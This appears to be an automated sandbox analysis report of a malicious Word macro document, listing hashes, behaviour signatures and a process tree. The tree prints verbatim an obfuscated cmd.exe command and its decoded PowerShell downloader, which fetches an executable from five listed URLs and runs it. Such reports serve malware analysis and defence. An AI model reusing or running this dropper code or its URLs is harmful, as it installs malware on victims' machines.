Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    19-05-2024 20:34

General

  • Target

    5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc

  • Size

    87KB

  • MD5

    5b5523e3de0be3f3888924ee205feefc

  • SHA1

    57a0ded868c84a681e05aacfa483e9cf2bdd0875

  • SHA256

    6fc0496f0b92374c976b56da6a0e3aa03bd960a04207a0354b0f2ba6c2654be9

  • SHA512

    0049a31b6e8fb45d7fddf1b98beda860b8ce21d21ac74efc1a9018ab6b494180b05580a5842a223462d8c1170c16ea7439bf9aff38004b73de145445f3ffbf71

  • SSDEEP

    1536:+Bocn1kp59gxBK85fBnx+amHIUAHcAdAbRjf7ZD+gB:X41k/W487oRnZlB

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2756
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:2800
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell "powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like '*MZ*') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} "
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2884
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =wwH
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1928

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      0441f54cb195a7a24621e4ca39c70f6e

      SHA1

      2989eff9c0a196169fbcb6ffeddc70f38c6ba481

      SHA256

      43ee158bc73052f3e02e7dcddb3f7881c37231864f6370c5acbc489b19e2424c

      SHA512

      8cc29883a880a83730ba302c9e0212de33fd73088517d9d866ccb336dc897e67f5cc951c55696c20cc7a45ef64af82876b5d9232d683ba1751d5d3eadb7f65fe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      7470bbea6fb7d9fe2a636721b23a0c4f

      SHA1

      eb3ac01fcd62313ccfec329a1b62b2c52ee62715

      SHA256

      b3b1facac31584d1bbe474dc7831792bfeb18c82be1d547b3609b7ce0e6867b1

      SHA512

      17cf23a089782bb89f9e7fe76b67f5ffda69037efc442e1fc0c5bb094197e7597df6b481a556b137a45f8d5203b636f072f3a8963d935a7552f6fb84d12bff27

    • memory/2756-6-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-0-0x000000002F651000-0x000000002F652000-memory.dmp

      Filesize

      4KB

    • memory/2756-7-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-8-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-2-0x00000000719FD000-0x0000000071A08000-memory.dmp

      Filesize

      44KB

    • memory/2756-26-0x00000000719FD000-0x0000000071A08000-memory.dmp

      Filesize

      44KB

    • memory/2756-27-0x00000000003B0000-0x00000000004B0000-memory.dmp

      Filesize

      1024KB

    • memory/2756-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2756-42-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2756-43-0x00000000719FD000-0x0000000071A08000-memory.dmp

      Filesize

      44KB

    • memory/2884-21-0x0000000005570000-0x000000000558F000-memory.dmp

      Filesize

      124KB